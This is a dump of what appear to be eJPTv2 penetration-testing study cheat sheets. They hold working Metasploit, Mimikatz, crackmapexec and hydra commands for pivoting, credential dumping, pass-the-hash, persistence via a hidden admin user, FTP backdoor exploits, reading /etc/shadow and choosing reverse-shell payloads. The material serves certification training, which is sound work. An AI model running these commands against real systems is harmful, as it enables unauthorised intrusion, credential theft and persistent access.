[SMTP](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/SMTP.md) 11 | - [SNMP](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/SNMP.md) 12 | - [SQL](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/SQL.md) 13 | - [SSH](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/SSH.md) 14 | - [WinRM](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/WinRM.md) 15 | 16 | 17 | 18 | 2. **Post-Exploitation - Windows** 19 | - [Enumeration - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Enumeration%20-%20Windows.md) 20 | - [Privilege Escalation - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Privilege%20Escalation%20-%20Windows.md) 21 | - [Dumping Hashes - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Dumping%20Hashes%20-%20Windows.md) 22 | - [Persistence - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Persistence%20-%20Windows.md) 23 | - [Clearing Tracks - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Clearing%20Tracks%20-%20Windows.md) 24 | 25 | 26 | 27 | 3. **Post-Exploitation - Linux** 28 | - [Enumeration - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Enumeration%20-%20Linux.md) 29 | - [Privilege Escalation - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Privilege%20Escalation%20-%20Linux.md) 30 | - [Dumping Hashes - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Dumping%20Hashes%20-%20Linux.md) 31 | - [Persistence - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Persistence%20-%20Linux.md) 32 | - [Clearing Tracks - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Clearing%20Tracks%20-%20Linux.md) 33 | 34 | 35 | 36 | 4. **Techniques** 37 | - [Bind shells](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Bind%20shells.md) 38 | - [Common Wordlists & Tools](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Common%20Wordlists%20%26%20Tools.md) 39 | - [Fixing Exploits - Manual (RCE)](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Fixing%20Exploits%20-%20Manual%20(RCE).md) 40 | - [Pivoting](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Pivoting.md) 41 | - [Reverse Shells](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Reverse%20Shells.md) 42 | - [T1046](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/T1046.md) 43 | - [Transfer Files](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Transfer%20Files.md) 44 | - [Upgrading Shells](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/Upgrading%20Shells.md) 45 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # eJPTv2 2 | 3 | INE Security’s eJPT is for entry-level Penetration testers that validates that the individual has the knowledge, skills, and abilities required to fulfill a role as a Junior Penetration Tester. 4 | 5 | This exam is designed to be the first milestone certification for someone with little to no experience in cybersecurity, simulating the skills utilized during a real-world engagement. This exam truly shows that the candidate has what it takes to be part of a high-performing penetration testing team. 6 | 7 | **The eJPT evaluates an individual’s skills across various domains and objectives, certifying their mastery and understanding:** 8 | 9 | 1. **Assessment Methodologies (25%)** 10 | - Locate endpoints on a network 11 | - Identify open ports and services on a target 12 | - Identify operating system of a target 13 | - Extract company information from public sources 14 | - Gather email addresses from public sources 15 | - Gather technical information from public sources 16 | - Identify vulnerabilities in services 17 | - Evaluate the criticality and potential impact of identified vulnerabilities 18 | 19 | 2. **Host and Networking Auditing (25%)** 20 | - Compile information from files on target 21 | - Enumerate network information from files on target 22 | - Enumerate system information on target 23 | - Gather user account information on target 24 | - Transfer files to and from target 25 | - Gather hash/password information from target 26 | 27 | 3. **Host and Network Penetration Testing (35%)** 28 | - Identify and modify exploits 29 | - Conduct exploitation with metasploit 30 | - Demonstrate pivoting by adding a route and by port forwarding 31 | - Conduct brute-force password attacks and hash cracking 32 | 33 | 4. **Web Application Penetration Testing (15%)** 34 | - Identify vulnerabilities in web applications 35 | - Locate hidden file and directories 36 | - Conduct brute-force login attack 37 | - Conduct web application reconnaissance 38 | 39 | # Content Map 40 | 41 | - [Course Notes Index](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course%20Notes%20Index.md) 42 | 43 | 44 | 45 | - [eJPT - Cheat Sheets](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/eJPT%20-%20Cheat%20Sheets.md) 46 | 47 | 48 | 49 | - [Skill Check - CTF](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check.md) 50 | 51 | # Penetration Testing Phases 52 | 53 | - **Information Gathering** 54 | - Network Mapping 55 | - Host Discovery 56 | - Port Scanning 57 | - Service Detection & OS 58 | - Detection 59 | - **Enumeration** 60 | - Service Enumeration 61 | - User Enumeration 62 | - Share Enumeration 63 | - **Exploitation** 64 | - Vulnerability Analysis & Identification 65 | - Developing / Modifying Exploits 66 | - Service Exploitation 67 | - **Post exploitation** 68 | - Local Enumeration 69 | - Privilege Escalation 70 | - Maintaining Access 71 | - Clearing Tracks 72 | 73 | # Black Box Methodology 74 | 75 | - Host Discovery 76 | - Port Scanning & Enumeration 77 | - Vulnerability detection / scanning 78 | - Exploitation 79 | - Manual 80 | - Automated 81 | - Post Exploitation 82 | - Privilege Escalation 83 | - Persistence 84 | - Dumping Hashes 85 | 86 | # Exploitation Methodology 87 | 88 | - Identify Vulnerable Services 89 | - Identify & Prepare Exploit Code 90 | - Gaining Access 91 | - Automated - MSF 92 | - Manual 93 | - Obtain remote access on target system 94 | - Bypass AV detection 95 | - Pivot on to other Systems 96 | -------------------------------------------------------------------------------- /Cheat-Sheets/Pivoting.md: -------------------------------------------------------------------------------- 1 | ## proxychains 2 | 3 | ```shell 4 | run autoroute -s / 5 | # This command is used in the Meterpreter session within the Metasploit Framework. It sets up a route through a compromised machine to access other networks that are not directly reachable from the attacker's machine. 6 | ``` 7 | 8 | Now, let's start the socks proxy server to access the pivot system on the attacker's machine using the proxychains tool. 9 | First start the socks server using the Metasploit module. 10 | 11 | ```shell 12 | background 13 | use auxiliary/server/socks_proxy 14 | # Creates a SOCKS4a proxy server inside Metasploit. 15 | # Useful for pivoting — allows routing tools like proxychains or browsers through a Meterpreter session or compromised host. 16 | show options 17 | set SRVPORT 9050 18 | set VERSION 4a 19 | exploit 20 | jobs 21 | ``` 22 | 23 | Now, let's run nmap with proxychains to identify SMB port (445) on the pivot machine. We could also specify multiple ports. But, in this case, we are only interested in SMB service. 24 | 25 | ```shell 26 | proxychains nmap -sT -Pn -sV -p 445 27 | ``` 28 | 29 | Now, let's use the `net view` command to find all resources shared by the machine. 30 | 31 | ```shell 32 | # Interact with the meterpreter session again 33 | sessions -i 1 34 | 35 | pgrep explorer 36 | migrate 37 | 38 | shell 39 | net view 40 | ``` 41 | 42 | We can see two shared resources. **Documents** and **K** drive. This confirms that pivot target allows Null Sessions, so we can access the shared resources. Also, we can achieve the same goal in several ways. 43 | 44 | ```shell 45 | net use D: \\\Documents 46 | net use K: \\\K$ 47 | 48 | # We successfully mapped the resources to D and K drives. Let's check what is inside these mapped drives. 49 | dir D: 50 | dir K: 51 | 52 | cd D:\\ 53 | download Confidential.txt 54 | download FLAG2.txt 55 | ``` 56 | 57 |
58 | 59 | # Windows Pivoting 60 | 61 | **Pivoting with port forwarding** 62 | 63 | ```shell 64 | # VICTIM 1 65 | ipconfig 66 | # We can observe, there is only one network adapter and we have two machine IP addresses but we cannot access “Victim Machine 2” directly from the attacker’s machine. We will add a route and then we will run an auxiliary port scanner module on the second victim machine to discover a host and open ports. 67 | run autoroute -s # e.g. 10.0.16.0/20 68 | 69 | # VICTIM 2 70 | use auxiliary/scanner/portscan/tcp 71 | set RHOSTS # Victim 2 was provided 72 | exploit 73 | 74 | # We have discovered port 80 on the pivot machine. Now, we will forward the remote port 80 to local port 1234 and grab the banner using Nmap 75 | sessions -i 1 76 | portfwd add -l 1234 -p 80 -r 77 | portfwd list 78 | 79 | # We have forwarded the port, now use Nmap to find the running application name and version. 80 | db_nmap -sS -sV -p 1234 localhost 81 | ``` 82 | 83 | **So just to summarize:** 84 | - Gained access to **Victim Machine 1**. 85 | - Added a route to its internal subnet to reach **Victim Machine 2**. 86 | - Scanned and discovered **open ports** on Victim 2. 87 | - **Forwarded** remote ports from Victim 2 to a **local port** on Kali for analysis. 88 | - Used **Nmap** to identify service versions. 89 | - Launched an exploit to gain access to **Victim Machine 2**. 90 | 91 | ### Exploitation - example 92 | 93 | ```shell 94 | use exploit/windows/http/badblue_passthru 95 | set PAYLOAD windows/meterpreter/bind_tcp 96 | set RHOSTS 97 | exploit 98 | ``` 99 | -------------------------------------------------------------------------------- /Cheat-Sheets/Dumping Hashes - Windows.md: -------------------------------------------------------------------------------- 1 | # Dumping Hashes With Mimikatz - Kiwi 2 | 3 | The Meterpreter Kiwi plugin is a Metasploit Framework extension based on Mimikatz, designed for extracting sensitive credentials from compromised Windows systems. 4 | 5 | **Kiwi Extension for Credential Dumping** 6 | 7 | ```shell 8 | # Load the Kiwi Extension for Credential Dumping. 9 | load kiwi # Load the Kiwi extension. 10 | help kiwi # Shows the help menu for available Kiwi commands. 11 | 12 | creds_all # Dump all stored credentials, including plaintext passwords, hashes, and Kerberos tickets. 13 | lsa_dump_sam # The SAM file contains hashed credentials for local user accounts. 14 | lsa_dump_secrets # Find the syskey by dumping the LSA secrets. 15 | ``` 16 | 17 | **Manual Credential Extraction Using Mimikatz Executable** 18 | 19 | ```shell 20 | # Upload the Mimikatz executable from your local machine. 21 | upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe 22 | 23 | shell # Start a command shell from the Meterpreter session. 24 | .\mimikatz.exe # Execute Mimikatz from the shell. 25 | 26 | # Verify Privileges in Mimikatz 27 | privilege::debug # Should return 'Privilege '20' OK' if successful. 28 | lsadump::sam # Dumps hashed credentials from the SAM file. 29 | lsadump::secrets # Extracts system secrets. 30 | 31 | # Extract Cleartext Passwords from Memory 32 | sekurlsa::logonpasswords # If the system is configured to store passwords in memory, Mimikatz can extract them. 33 | # If no cleartext passwords appear, the system is likely well-configured and secured. 34 | ``` 35 | 36 | > **NOTE:** When users log on to a Windows system, credentials might be stored in memory. Misconfigured systems can store these passwords in cleartext, allowing tools like Mimikatz to retrieve them. Well-configured systems clear passwords from memory, meaning no results will appear from this command. 37 | 38 |
39 | 40 | # Windows Credential Dumping and Cracking 41 | 42 | **Dump NTLM hashes** 43 | 44 | ```shell 45 | # List of user accounts and their hashes 46 | hashdump 47 | 48 | # Verify that the hashes are stored in the MSF database or not. 49 | background 50 | creds 51 | ``` 52 | 53 | **Crack NTLM hashes using Metasploit** 54 | 55 | ```shell 56 | # Use an auxiliary NTLM hash cracking module to crack stored NTLM hashes. 57 | use auxiliary/analyze/crack_windows 58 | set CUSTOM_WORDLIST 59 | exploit 60 | creds 61 | ``` 62 | 63 | **Crack NTLM hashes using John The Ripper** 64 | 65 | ```shell 66 | john 67 | john --list=formats 68 | john --list=formats | grep NTLM 69 | john --list=formats | grep NT 70 | 71 | # If we don't specify the word list, then John The Ripper will use its default word list. 72 | john --format=NT hashes.txt 73 | 74 | # For specific wordlist 75 | john --format=NT hashes.txt --wordlist= # Save the credentials 76 | 77 | # Example: 78 | gzip -d /usr/share/wordlists/rockyou.txt.gz 79 | john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt 80 | ``` 81 | 82 | From a penetration tester’s perspective, this information is extremely valuable because it means we can now legitimately authenticate to the target system — either through **RDP** or another protocol such as **SSH**. 83 | 84 | **Crack NTLM hashes using Hashcat** 85 | 86 | ```shell 87 | hashcat --help 88 | hashcat -a 0 -m 1000 hashes.txt /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 89 | # Cracks NTLM hashes (-m 1000) using a wordlist attack (-a 0) against hashes stored in hashes.txt. 90 | # Commonly used for Windows password hashes dumped from SAM/NTDS files. 91 | ``` 92 | -------------------------------------------------------------------------------- /Cheat-Sheets/Persistence - Windows.md: -------------------------------------------------------------------------------- 1 | # Pass the Hash Attacks 2 | 3 | Obtaining and using the administrator's NTLM hash allows persistent access to the target system through a technique called **pass-the-hash (PTH)** - enabling authentication without the plaintext password. This underscores the critical need for strong credential management and highlights risks tied to weak or reused passwords. 4 | 5 | **PsExec** 6 | The PsExec module in Metasploit (`exploit/windows/smb/psexec`) is used to execute commands on a remote Windows machine over **SMB** (Server Message Block). This module is particularly useful for lateral movement and privilege escalation in post-exploitation scenarios. 7 | 8 | ```shell 9 | use exploit/windows/smb/psexec 10 | show options 11 | set LPORT 12 | set RHOSTS 13 | set SMBUser Administrator # Use the Administrator account for SMB authentication 14 | set SMBPass # Provide the LM and NTLM hash (in LM:NTLM format) 15 | exploit 16 | ``` 17 | 18 | Even if you already have administrative access on one machine through a Meterpreter session, using PsExec allows you to: 19 | - **Establish Persistent Access:** If your original exploit gets patched or the vulnerability is fixed, using PsExec with valid credentials (or hashes) lets you regain access without exploiting the vulnerability again. 20 | - **Lateral Movement Across the Network:** You can use stolen credentials (or NTLM hashes) to move from one compromised machine to other systems within the network that share the same credentials. 21 | - **Privilege Escalation:** If you don't have the highest privileges on a new target system, PsExec can help you gain full administrative access using known valid credentials. 22 | 23 | **Crackmapexec** 24 | 25 | ```shell 26 | # Another way is using crackmapexec 27 | crackmapexec smb -u Administrator -H "" 28 | crackmapexec smb -u Administrator -H "" -x "ipconfig" 29 | crackmapexec smb -u Administrator -H "" -x "whoami" 30 | ``` 31 | 32 |
33 | 34 | # Persistence Service - Metasploit Modules 35 | 36 | ```shell 37 | use exploit/windows/local/persistence_service 38 | show options 39 | set SESSION 1 40 | exploit 41 | # By default the module uses the following payload: windows/meterpreter/reverse_tcp 42 | 43 | # Start another msfconsole and run multi handler to re-gain access 44 | use exploit/multi/handler 45 | set LHOST 46 | set PAYLOAD windows/meterpreter/reverse_tcp 47 | set LPORT 48 | exploit 49 | 50 | # Switch back to the active meterpreter session and reboot the machine 51 | session -i 1 52 | reboot 53 | # Once the machine reboots we would expect a new meterpreter session without re-exploitation. This happened because we have added a malicious executable for maintaining access 54 | ``` 55 | 56 |
57 | 58 | # Maintaining Access: RDP 59 | 60 | We will be creating a user and adding that user to the Administrators group. All this can be done using the `getgui` meterpreter command. 61 | 62 | The `getgui` command makes the below changes to the target machine: 63 | - Enable RDP service if it’s disabled 64 | - Creates new user for an attacker 65 | - Hide user from Windows Login screen 66 | - Adding created user to "Remote Desktop Users" and "Administrators" groups 67 | 68 | ```shell 69 | run getgui -e -u alice -p hack_123321 70 | # run getgui > Runs the getgui Meterpreter script — short for “get GUI (Graphical User Interface)” 71 | # -e > Enables Remote Desktop (RDP) service on the target 72 | # -u alice > Creates a new user named alice 73 | # -p hack_123321 > Sets the password for the alice user to hack_123321 74 | ``` 75 | -------------------------------------------------------------------------------- /Cheat-Sheets/FTP.md: -------------------------------------------------------------------------------- 1 | # FTP 2 | 3 | **FTP (File Transfer Protocol)** 4 | **Description**: Unencrypted protocol for transferring files between client and server 5 | **Ports**: TCP 21 (command), TCP 20 (data) 6 | **Known Vulnerabilities**: Anonymous login (misconfiguration), Brute-force attacks, Cleartext credential sniffing, FTP Bounce Attack (CVE-1999-0205) 7 | 8 |
9 | 10 | # Basic FTP Usage 11 | 12 | ```shell 13 | ftp 14 | # Opens an FTP connection to the target on the specified port. 15 | # Commands inside ftp: ls, cd, get , put , exit 16 | 17 | ftp # Anonymous login 18 | # When prompted, enter anonymous as both the username and password for login. 19 | ``` 20 | 21 |
22 | 23 | # Enumeration with Metasploit and Nmap 24 | 25 | ```shell 26 | use auxiliary/scanner/ftp/ftp_version 27 | # Scans the FTP service to identify version and banner information. 28 | 29 | use auxiliary/scanner/ftp/anonymous 30 | # Checks if the FTP server allows anonymous login. 31 | 32 | use auxiliary/scanner/ftp/ftp_login 33 | # Performs brute-force login attempts on the FTP service using user/password lists. 34 | 35 | nmap --script ftp-anon -p 21 36 | # Checks if the FTP server allows anonymous login. 37 | 38 | nmap --script ftp-brute --script-args userdb=/root/users -p 21 39 | # Performs brute-force attack on FTP using a list of usernames. 40 | ``` 41 | 42 |
43 | 44 | # Brute-Force with Hydra and Nmap 45 | 46 | ```shell 47 | hydra -L -P ftp:// -t 4 48 | # Brute-forces FTP login with 4 parallel connections. 49 | 50 | hydra -L -P ftp://: 51 | # Same as above, but specifies a custom FTP port. 52 | 53 | hydra -L -P ftp 54 | # Alternative syntax for brute-forcing FTP without URL format. 55 | 56 | echo "sysadmin" > users 57 | # Writes "sysadmin" to the file users, replacing its contents. 58 | 59 | nmap --script ftp-brute --script-args userdb=/root/users -p 21 60 | # Brute-forces FTP usernames from the specified file using Nmap. 61 | ``` 62 | 63 |
64 | 65 | # FTP Vulnerability Discovery 66 | 67 | ```shell 68 | nmap -sV -p 21 --script ftp-proftpd-backdoor 69 | # Checks for a known ProFTPD backdoor vulnerability (CVE-2010-4221). 70 | 71 | nmap --script vuln -p 21 72 | # Runs vulnerability scripts against FTP to detect common issues. 73 | 74 | searchsploit ProFTPD 75 | # Searches Exploit-DB for known ProFTPD vulnerabilities based on the detected version. 76 | ``` 77 | 78 |
79 | 80 | # Exploiting FTP Vulnerabilities 81 | 82 | ```shell 83 | use exploit/unix/ftp/proftpd_133c_backdoor 84 | # Exploits a backdoor in ProFTPD 1.3.3c (CVE-2010-4221) to gain a remote root shell. 85 | # Triggered by sending a crafted command to the FTP server. 86 | set payload cmd/unix/reverse 87 | set RHOSTS 88 | set LHOST 89 | 90 | use exploit/unix/ftp/vsftpd_234_backdoor 91 | # Exploits a backdoor in vsftpd 2.3.4 that opens a shell on port 6200 after a smiley :) username login attempt. 92 | # Vulnerable version: vsftpd 2.3.4 (intentionally backdoored). 93 | 94 | use exploit/unix/ftp/proftpd_modcopy_exec 95 | # ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) 96 | # Exploits the mod_copy module in ProFTPD to copy files from or to any location on the server. 97 | # Allows remote code execution by writing a malicious file into a web-accessible directory. 98 | # Set the variables in msfconsole for RHOSTS , LHOST , and SITEPATH 99 | ``` 100 | -------------------------------------------------------------------------------- /Cheat-Sheets/Common Wordlists & Tools.md: -------------------------------------------------------------------------------- 1 | # Username & Password Wordlists 2 | 3 | - `/usr/share/wordlists/rockyou.txt` 4 | → One of the most popular password lists for brute-forcing. 5 | _(Extract first: `gzip -d /usr/share/wordlists/rockyou.txt.gz`)_ 6 | 7 | - `/usr/share/metasploit-framework/data/wordlists/common_passwords.txt` 8 | → Contains frequently used passwords — ideal for fast brute-force attempts. 9 | 10 | - `/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt` 11 | → Unix/Linux-specific passwords. 12 | 13 | - `/usr/share/metasploit-framework/data/wordlists/common_users.txt` 14 | → List of common usernames (useful with Hydra, SMB, FTP, etc.). 15 | 16 | - `/usr/share/metasploit-framework/data/wordlists/unix_users.txt` 17 | → Unix/Linux user accounts — pair with `unix_passwords.txt` for targeted attacks. 18 | 19 | - `/usr/share/wordlists/metasploit/root_userpass.txt` 20 | → Default/root user-password combinations — ideal for SSH or Telnet brute-force. 21 | 22 | - `/usr/share/commix/src/txt/usernames.txt` 23 | → Used for testing login forms or command injection username discovery. 24 | 25 |
26 | 27 | # Directories & Files Enumeration 28 | 29 | - `/usr/share/metasploit-framework/data/wordlists/directory.txt` 30 | → Basic list of web directories — works well with `dir_scanner`. 31 | 32 | - `/usr/share/dirb/wordlists/common.txt` 33 | → Frequently used for `dirb` and `gobuster`; includes common directories and files. 34 | 35 | - `/usr/share/wordlists/dirb/common.txt` 36 | → Alternative location for the same `dirb` wordlist. 37 | 38 | - `/usr/share/metasploit-framework/data/wordlists/sensitive_files.txt` 39 | → Tries to find sensitive files (e.g., `.env`, `config.php`, `db.sql`). 40 | 41 |
42 | 43 | # Web Shells (Post-Exploitation) 44 | 45 | - `/usr/share/webshells/php/php-reverse-shell.php` 46 | → PHP reverse shell — upload this to gain a shell from LFI/RFI or insecure upload. 47 | 48 | - `/usr/share/webshells/asp/` 49 | → ASP reverse shells — useful for IIS targets, especially during WebDAV or `rejetto_hfs` exploitation. 50 | 51 | - `/usr/share/webshells/jsp/` 52 | → JSP reverse shells — often used with Tomcat exploits like `jsp_upload_bypass`. 53 | 54 |
55 | 56 | # Windows Post-Exploitation Binaries 57 | 58 | - `/usr/share/windows-resources/binaries/` 59 | → Useful Windows binaries for file transfer or reverse shells: 60 | `nc.exe`, `wget.exe`, `ncat.exe`, `PowerUp.ps1`, `PowerShell Empire`, etc. 61 | 62 |
63 | 64 | # Common Payloads 65 | 66 | ### Windows Payloads 67 | 68 | - `windows/meterpreter/reverse_tcp` 69 | → Full-featured Meterpreter reverse shell (32-bit systems). 70 | 71 | - `windows/x64/meterpreter/reverse_tcp` 72 | → Same as above, for 64-bit Windows systems. 73 | 74 | - `windows/shell/reverse_tcp` 75 | → Simple reverse shell without Meterpreter features. 76 | 77 | - `windows/shell_bind_tcp` 78 | → Binds a shell to the target — attacker connects in. 79 | 80 |
81 | 82 | ### Linux Payloads 83 | 84 | - `linux/x86/meterpreter/reverse_tcp` 85 | → Reverse Meterpreter shell for Linux. 86 | 87 | - `linux/x64/shell/reverse_tcp` 88 | → Reverse shell for 64-bit Linux systems. 89 | 90 | - `cmd/unix/reverse_bash` 91 | → Bash-based reverse shell (useful in RCE or command injection). 92 | 93 | - `cmd/unix/reverse_python` 94 | → Python reverse shell — works well if Python is available on target. 95 | 96 | - `cmd/unix/reverse_perl` 97 | → Perl-based reverse shell — often usable on older systems. 98 | 99 |
100 | 101 | ### Web-Based Payloads 102 | 103 | - `php/meterpreter/reverse_tcp` 104 | → Meterpreter shell through a PHP upload. 105 | 106 | - `php/reverse_php` 107 | → Basic PHP reverse shell (non-Meterpreter). 108 | 109 | - `asp/reverse_tcp` 110 | → Basic ASP reverse shell — works with IIS targets. 111 | 112 | - `jsp/reverse_tcp` 113 | → JSP shell for Java-based targets like Tomcat. 114 | 115 |
116 | 117 | ### Multi-Platform 118 | 119 | - `multi/handler` 120 | → Listener module used to catch incoming reverse shells (match to payload used). 121 | 122 | - `multi/shell/reverse_tcp` 123 | → Basic reverse TCP shell that works across different platforms. 124 | -------------------------------------------------------------------------------- /Cheat-Sheets/Enumeration - Windows.md: -------------------------------------------------------------------------------- 1 | # Metasploit modules 2 | 3 | With a Meterpreter session, we can use post-exploitation modules to automate information enumeration. 4 | 5 | ```shell 6 | use post/windows/gather/win_privs # Enumerates current user privileges 7 | use post/windows/gather/enum_logged_on_users # Lists current and previously logged-in users 8 | use post/windows/gather/checkvm # Detects if the system is a virtual machine 9 | use post/windows/gather/enum_applications # Lists installed applications on the target 10 | use post/windows/gather/enum_computers # Enumerates other computers on the same LAN 11 | use post/windows/gather/enum_shares # Lists shared folders accessible from the target 12 | use post/windows/gather/enum_av # Detects installed antivirus software 13 | use post/windows/gather/enum_patches # Lists installed Windows patches 14 | ``` 15 | 16 |
17 | 18 | # JAWS (Just Another Windows Enum Script) 19 | 20 | **[JAWS](https://github.com/411Hall/JAWS)** (Just Another Windows Enum Script) is an open-source PowerShell script designed to help penetration testers automate local enumeration and identify privilege escalation vectors on Windows systems. 21 | 22 | ```shell 23 | # Upload the script on the target machine 24 | upload /root/jaws-enum.ps1 25 | 26 | # After uploading the script successfully, we will need to spawn a command shell session 27 | shell 28 | # We can now execute the jaws-enum.ps1 script 29 | powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt 30 | # jaws-enum.ps1 script will run and save the results into a file called JAWS-Enum.txt 31 | # Note: JAWS will take a couple of minutes to complete the enumeration process 32 | ``` 33 | 34 |
35 | 36 | # System Info 37 | 38 | ```shell 39 | sysinfo # Enumerating System Information 40 | 41 | hostname # Enumerate the hostname of the system by spawning a native shell session on the target system 42 | 43 | # We can also get a list of installed updates on the system with more detailed information like when the update was installed by running the following command. 44 | wmic qfe get Caption,Description,HotFixID,InstalledOn 45 | 46 | # File that can provide information pertinent to the operating system version and also provide with additional information like the build number and the service pack. This file is not always available. 47 | cd C:\\Windows\\System32 48 | cat eula.txt 49 | 50 | systeminfo # Comprehensive information regarding the target system 51 | whoami # Get current user 52 | whoami /priv # Get current user privileges 53 | net localgroup # Get group membership of user 54 | net user # Get user info 55 | getuid # Enumerate the current users we have access to on the target system 56 | getprivs # Enumerate the Windows privileges that the Administrator user has 57 | 58 | # Check the list of currently logged-on users 59 | background 60 | use post/windows/gather/enum_logged_on_users 61 | set SESSION 1 62 | run 63 | ``` 64 | 65 |
66 | 67 | # Network Info 68 | 69 | ```shell 70 | # Display the system's network configuration details, including IP addresses, subnet masks, and default gateways for all network interfaces 71 | ipconfig 72 | ipconfig /all 73 | 74 | route print # Routing table 75 | 76 | # This command in Windows shows the ARP cache, listing IP addresses and their associated MAC addresses recently resolved on the local network 77 | arp -a # This information is going to be important during the Pivoting phase 78 | 79 | netstat -ano # View a list of open ports being used by services on the target system 80 | 81 | # Display the current firewall settings for all network profiles (Domain, Private, and Public), including their state (on/off), inbound/outbound rules, and logging configurations 82 | netsh firewall show state 83 | # OR 84 | netsh advfirewall show allprofiles 85 | ``` 86 | 87 |
88 | 89 | # Processes & Services 90 | 91 | ```shell 92 | ps # Enumerate a list of running processes on the Windows target 93 | net start # We can enumerate a list of running services 94 | net stop # Stop a service 95 | wmic service list brief # We can learn more about the running services 96 | tasklist /svc # We can also enumerate a list of running tasks and the corresponding services for each task 97 | 98 | # List of scheduled tasks on the Windows target 99 | schtasks /query /fo list /v # A lot of info so we need to copy paste in a document separately 100 | # This information is important because in certain cases, scheduled tasks could be misconfigured or configured in a way that makes them vulnerable to exploitation, and most specifically, they can be exploited in some cases to elevate our privilege 101 | 102 | netstat -tuln 127.0.0.1 103 | netstat -ano | findstr 127.0.0.1 104 | # Enumerate local services 105 | 106 | nc 127.0.0.1 8888 107 | # Interact with the service 108 | ``` 109 | -------------------------------------------------------------------------------- /Cheat-Sheets/SQL.md: -------------------------------------------------------------------------------- 1 | # SQL 2 | 3 | **MySQL** 4 | **Description**: MySQL is an open-source relational database management system - it can expose critical data or remote access if misconfigured or weakly protected 5 | **Ports**: TCP 3306 6 | **Known Vulnerabilities**: Default/empty passwords, SQL Injection, privilege escalation via UDF (User-Defined Functions), outdated server versions with RCE flaws 7 | 8 |
9 | 10 | # Basic SQL Commands 11 | 12 | ```shell 13 | mysql -u -p -h # root 14 | # Connects to a remote MySQL server using the specified username and prompts for a password. 15 | 16 | # Inside MySQL prompt 17 | show databases; 18 | use ; 19 | show tables; 20 | select * from ; 21 | 22 | # Read system files if possible 23 | select load_file('/etc/shadow'); 24 | 25 | # Change WordPress admin password (example) 26 | UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin'; 27 | # Then access 28 | http://:/wordpress/wp-admin 29 | ``` 30 | 31 |
32 | 33 | # Enumeration with Metasploit Modules 34 | 35 | **MySQL** 36 | 37 | ```shell 38 | use auxiliary/scanner/mysql/mysql_version # Identify MySQL version 39 | use auxiliary/scanner/mysql/mysql_login # Brute-force MySQL credentials. Username is root 40 | use auxiliary/admin/mysql/mysql_enum # Enumerate users, databases 41 | use auxiliary/admin/mysql/mysql_sql # Run custom SQL queries (needs valid creds) 42 | use auxiliary/scanner/mysql/mysql_hashdump # Dump password hashes 43 | use auxiliary/scanner/mysql/mysql_schemadump # Dump full database schema 44 | use auxiliary/scanner/mysql/mysql_file_enum # Find readable files 45 | use auxiliary/scanner/mysql/mysql_writable_dirs # Find writable directories 46 | ``` 47 | 48 | **MSSQL** 49 | 50 | ```shell 51 | use auxiliary/scanner/mssql/mssql_login # MSSQL brute-force 52 | use auxiliary/admin/mssql/mssql_enum # Enumerate server, db info 53 | use auxiliary/admin/mssql/mssql_enum_sql_logins # List SQL users 54 | use auxiliary/admin/mssql/mssql_exec # Run OS commands via xp_cmdshell 55 | use auxiliary/admin/mssql/mssql_enum_domain_accounts # Map domain accounts 56 | ``` 57 | 58 |
59 | 60 | # Enumeration with Nmap 61 | 62 | **MySQL Nmap Scripts** 63 | 64 | ```shell 65 | nmap --script mysql-empty-password -p 3306 66 | # Checks if the MySQL server allows login with an empty password. 67 | 68 | nmap --script mysql-info -p 3306 69 | # Retrieves MySQL server version and basic configuration info. 70 | 71 | nmap --script mysql-users --script-args="mysqluser=root,mysqlpass=''" -p 3306 72 | # Attempts to enumerate MySQL user accounts using provided credentials. 73 | 74 | nmap --script mysql-databases --script-args="mysqluser=root,mysqlpass=''" -p 3306 75 | # Lists databases accessible with the provided MySQL credentials. 76 | 77 | nmap --script mysql-variables --script-args="mysqluser=root,mysqlpass=''" -p 3306 78 | # Retrieves global system variables from the MySQL server. 79 | 80 | nmap --script mysql-dump-hashes --script-args="username=root,password=''" -p 3306 81 | # Dumps MySQL user password hashes using provided credentials. 82 | 83 | nmap --script mysql-query --script-args="query='SELECT count(*) FROM books.authors;',username=root,password=''" 